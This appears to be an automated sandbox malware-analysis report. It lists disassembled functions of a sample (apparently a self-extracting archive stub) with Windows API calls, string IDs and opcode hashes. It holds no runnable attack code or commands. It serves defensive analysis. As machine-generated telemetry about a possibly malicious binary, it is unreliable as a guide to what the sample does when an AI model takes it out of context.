                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
• Opcode ID: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
• Instruction ID: c89f6f938b2502366a7f1a09014f124e335746d3a76d5f912cf93ee1f6f16f43
• Opcode Fuzzy Hash: e71e01ae85825ea34f48c998cbd0a918e45418c53f481efde378114a51c589b8
• Instruction Fuzzy Hash: ABA012301006048782000B318F0554E76556F51741F00C024600080030C738C820A504

Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
  • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
• SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0073C2B1
• EndDialog.USER32(?,00000006), ref: 0073C2C4
• GetDlgItem.USER32(?,0000006C), ref: 0073C2E0
• SetFocus.USER32(00000000), ref: 0073C2E7
• SetDlgItemTextW.USER32(?,00000065,?), ref: 0073C321
• SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0073C358
• FindFirstFileW.KERNEL32(?,?), ref: 0073C36E
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0073C38C
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C39C
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C3B8
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C3D4
• _swprintf.LIBCMT ref: 0073C404
  • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
• SetDlgItemTextW.USER32(?,0000006A,?), ref: 0073C417
• FindClose.KERNEL32(00000000), ref: 0073C41E
• _swprintf.LIBCMT ref: 0073C477
• SetDlgItemTextW.USER32(?,00000068,?), ref: 0073C48A
• SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0073C4A7
• FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0073C4C7
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0073C4D7
• GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0073C4F1
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0073C509
• _swprintf.LIBCMT ref: 0073C535
• SetDlgItemTextW.USER32(?,0000006B,?), ref: 0073C548
• _swprintf.LIBCMT ref: 0073C59C
• SetDlgItemTextW.USER32(?,00000069,?), ref: 0073C5AF
  • Part of subcall function 0073AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0073AF35
  • Part of subcall function 0073AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0075E72C,?,?), ref: 0073AF84
Similarity
• API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
• String ID: %s %s$%s %s %s$Ps$REPLACEFILEDLG
• API String ID: 797121971-3735763087
• Opcode ID: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
• Instruction ID: 41af8123e138c39991a9e39684acf271988da33a1a71e735d3e27b5ac938812c
• Opcode Fuzzy Hash: fae4b981ddb71fdc9934bbf391eac62bbe02812d42e397a0a49535d442d866b3
• Instruction Fuzzy Hash: 3891C672548348BBE221DBB4DC4DFFB77ACEB49B01F048819F649D6081E779AA048762

Uniqueness
Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0073F844
• IsDebuggerPresent.KERNEL32 ref: 0073F910
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0073F930
• UnhandledExceptionFilter.KERNEL32(?), ref: 0073F93A
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
• Instruction ID: 8b4d795f7de893f82f85794bf1835eb9a3f6497b868faec1255c92c1421c02c2
• Opcode Fuzzy Hash: 5b2c012e3b2a345be0f080fc0c206869e8fcf8870a0aa7b1078fac3f990b0e9f
• Instruction Fuzzy Hash: 3B312B75D0531DDBEB11DFA4D9897CCBBB8AF04344F1040AAE40CA7261EB759B848F44

Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _wcslen
• String ID: Us$ps$zs
• API String ID: 176396367-29227579
• Opcode ID: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
• Instruction ID: 7fa81c96801606b420cf1262a3342edcff88140508646429081132755a28d634
• Opcode Fuzzy Hash: 20a5a710893f9edbdbb007f8eb2b1a66ed014212277e46ea1890a5f1458b2d1e
• Instruction Fuzzy Hash: 3641C271A00669DBDB219F689C0A9EF7BB8EF00310F004029F946E7245DB38AE458BA5

Uniqueness
Uniqueness Score: -1.00%

APIs
• _swprintf.LIBCMT ref: 00722536
  • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
  • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
Similarity
• API ID: __vswprintf_c_l_swprintf_wcslen
• String ID: ;%u$x%u$xc%u
• API String ID: 3053425827-2277559157
• Opcode ID: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
• Instruction ID: 0a0a6aadf7980718e3b7b8ae622b68be9aeefc6ad1e12c60609e9cda79f15c9d
• Opcode Fuzzy Hash: c7a4bca8880fb59bf1712c684d68a0acca1a897b2d17a06c8de5a9c281f56a57
• Instruction Fuzzy Hash: 4DF14A71604360EBDB25EF24A499BFE77996F90300F08056DFD869B283DB6CC946C762

Uniqueness
Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 00742937
• ___except_validate_context_record.LIBVCRUNTIME ref: 0074293F
• _ValidateLocalCookies.LIBCMT ref: 007429C8
• __IsNonwritableInCurrentImage.LIBCMT ref: 007429F3
• _ValidateLocalCookies.LIBCMT ref: 00742A48
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
• Instruction ID: 7e608614f62e5a33cc000b61328f9f9edaf4d7a6a77add79381f1cddc120a424
• Opcode Fuzzy Hash: 06462bb893644e91f1094b01d7c390c85d0148c07e44a90d8f8426a4388c091b
• Instruction Fuzzy Hash: 9D41A634A00208EFCF10DF68C885A9E7BB5AF45324F54C155FC19AB393D779AA26CB91

Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
• Instruction ID: 8191ec3f4aedca0c52c6340bad3e928070f545265447f5a5e6261aa708864654
• Opcode Fuzzy Hash: 981f83c64f4735236670df370d33de393fd5e392a9f27ec543e13582c690cb2a
• Instruction Fuzzy Hash: 3B315E7264434596FA30AB549C42B7A73E4EB90720F50C51EFA8647281FBEDAD84C3A2

Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0074C868: _free.LIBCMT ref: 0074C891
• _free.LIBCMT ref: 0074C8F2
  • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
  • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
• _free.LIBCMT ref: 0074C8FD
• _free.LIBCMT ref: 0074C908
• _free.LIBCMT ref: 0074C95C
• _free.LIBCMT ref: 0074C967
• _free.LIBCMT ref: 0074C972
• _free.LIBCMT ref: 0074C97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: a63fb4b834cb868cc1fa71c29a04147911f3cdb715892f3edea46d4513544623
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: E2111271A8270CE6E5A1B771CC0FFCB7BAC9F04B00F404C15B29D66092DB69B5058B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0074891E
                                                                                                • Part of subcall function 00748DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?), ref: 00748DE2
                                                                                                • Part of subcall function 00748DCC: GetLastError.KERNEL32(?,?,0074C896,?,00000000,?,00000000,?,0074C8BD,?,00000007,?,?,0074CCBA,?,?), ref: 00748DF4
                                                                                              • _free.LIBCMT ref: 00748930
                                                                                              • _free.LIBCMT ref: 00748943
                                                                                              • _free.LIBCMT ref: 00748954
                                                                                              • _free.LIBCMT ref: 00748965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID: pu
                                                                                              • API String ID: 776569668-250260183
                                                                                              • Opcode ID: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                              • Instruction ID: cf02ad04314a453d07231639c371a063adbaeca253214bc9a17777f2743c044d
                                                                                              • Opcode Fuzzy Hash: 2960301863999a219f5d9d61578cffb99fe290ff3cfcb903f5ec30ca11127ad2
                                                                                              • Instruction Fuzzy Hash: 0DF03071A5121ACB86866F14FC0644D3BA1F7287223128505F414932B3DF7E4A529FCA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0073A699: GetDC.USER32(00000000), ref: 0073A69D
                                                                                                • Part of subcall function 0073A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0073A6A8
                                                                                                • Part of subcall function 0073A699: ReleaseDC.USER32(00000000,00000000), ref: 0073A6B3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0073A83C
                                                                                                • Part of subcall function 0073AAC9: GetDC.USER32(00000000), ref: 0073AAD2
                                                                                                • Part of subcall function 0073AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0073AB01
                                                                                                • Part of subcall function 0073AAC9: ReleaseDC.USER32(00000000,?), ref: 0073AB99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: "s$($As
                                                                                              • API String ID: 1061551593-951805127
                                                                                              • Opcode ID: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                              • Instruction ID: 6c5758b691f93ab1e0cf860a829ac206e820a946957ead690f1bf30e0ad4c46a
                                                                                              • Opcode Fuzzy Hash: c086b914c0ba545002e731aff767ba610c4eccd546e125b7cc833465b0f4e292
                                                                                              • Instruction Fuzzy Hash: 60910271208744AFE711DF25C845A6BBBE9FFC8701F00891EF59AD3221DB74A945CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 007305DA: _wcslen.LIBCMT ref: 007305E0
                                                                                                • Part of subcall function 0072B92D: _wcsrchr.LIBVCRUNTIME ref: 0072B944
                                                                                              • _wcslen.LIBCMT ref: 0072C197
                                                                                              • _wcslen.LIBCMT ref: 0072C1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                              • Instruction ID: ca86f43ce5b4a889c75ace76f09141be1251c6c70133f6cbe4cafb05679f7eb6
                                                                                              • Opcode Fuzzy Hash: b7786cbd79d0a3aca26cde56d9ff391be58f2f546f6ad2adf4f9f0f3114093b1
                                                                                              • Instruction Fuzzy Hash: E4417962100375D6D733AF34A856A7E73A8EF61744F20050EF8C26B082EB6D5E91C391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0072B9B8
                                                                                                • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072B9D6
                                                                                              • _wcschr.LIBVCRUNTIME ref: 0072B9E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 525462905-3142399695
                                                                                              • Opcode ID: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                              • Instruction ID: 7d393790a781042ce427cdd60dfa83bf6d40e299a3237ca2e9b88bdcdfbdc07f
                                                                                              • Opcode Fuzzy Hash: 320310f4162e4fb28d337e9b505fb1f958e0043c21c931165a166ccc1df27727
                                                                                              • Instruction Fuzzy Hash: 1D01F563514321A99A306B35AC4AD6BB7ACEE95770B50840AF584D6082FB28F89483B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00721316: GetDlgItem.USER32(00000000,00003021), ref: 0072135A
                                                                                                • Part of subcall function 00721316: SetWindowTextW.USER32(00000000,007535F4), ref: 00721370
                                                                                              • EndDialog.USER32(?,00000001), ref: 0073B2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0073B2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0073B304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1$xzw
                                                                                              • API String ID: 445417207-3717932900
                                                                                              • Opcode ID: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                              • Instruction ID: bada34eedb97f84da631fd3d5222949dfdde776cfc7202a5978394aac8ee8fa6
                                                                                              • Opcode Fuzzy Hash: b5aa76b9f5837434c5c96ec38d027e68530d2fbdae7f612e3bd3d8928b0e83cc
                                                                                              • Instruction Fuzzy Hash: 7011C432940128B6EB219A78AC49FFF376DFF19B40F104120FB46B61C1C7ACAA4597A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,007491AD,0074B188,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074986E
                                                                                              • _free.LIBCMT ref: 007498A3
                                                                                              • _free.LIBCMT ref: 007498CA
                                                                                              • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498D7
                                                                                              • SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 007498E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 8f9b1dc68df639f3ebe478ac213254b1fa9743822ac8c8d8c8eb032f3d59effd
                                                                                              • Instruction ID: cee4d5d51215897ab04ece455e3510353aca04d976ab76d2c292202c220d4297
                                                                                              • Opcode Fuzzy Hash: 8f9b1dc68df639f3ebe478ac213254b1fa9743822ac8c8d8c8eb032f3d59effd
                                                                                              • Instruction Fuzzy Hash: 6C01F436285705ABC312676C6C8D96B252EDBD27B27210234F625961A2EF6C8D025269
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 007431FB
                                                                                              • _abort.LIBCMT ref: 00743306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                              • Instruction ID: cb9d8e94a856b29b134e807ea031e5476bb86cceb0631f874f48a8091061731c
                                                                                              • Opcode Fuzzy Hash: d5face028c07b41d50a9fc02bdc25dc70bfb0e193bece27c6adafab57b5f41a6
                                                                                              • Instruction Fuzzy Hash: 9F414871900209EFDF15DF98CD82AEEBBB5BF48304F188159F908A7226D379AA51DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• __fprintf_l.LIBCMT ref: 0072D954
• _strncpy.LIBCMT ref: 0072D99A
  • Part of subcall function 00731DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00761030,00000200,0072D928,00000000,?,00000050,00761030), ref: 00731DC4
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• API String ID: 562999700-834177443
• Opcode ID: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
• Instruction ID: 32a3c694422b8237202525c493174bbbe71e4d93ccebe7be3e681bc10ebb04c3
• Opcode Fuzzy Hash: 385157331881866287f1723ab75f3f4c01b85e87f4e439809837cd66eddb367f
• Instruction Fuzzy Hash: E621907244025CEAEB31EEA4DC05FDE7BA8EF05300F044126F990961A2E779EA988B51
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: Malloc
• String ID: (s$2s$A
• API String ID: 2696272793-3699640820
• Opcode ID: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
• Instruction ID: 1e2223f70b577ee5254c014553fcd74677307ee944acad906459f4288d5710d9
• Opcode Fuzzy Hash: 79b28cf346e344f66fb151995496e40c840d158a6cb1ea9784dd44b7bdbf5c37
• Instruction Fuzzy Hash: FE01DB75901229ABCB14DFA4E844ADEBBF8FF09710B20415AE905E7250D7789A40CF94
Uniqueness

Uniqueness Score: -1.00%

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007491E0,?,00000000,?,00000001,?,?,00000001,007491E0,?), ref: 0074C9D5
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0074CA5E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00746CBE,?), ref: 0074CA70
• __freea.LIBCMT ref: 0074CA79
  • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
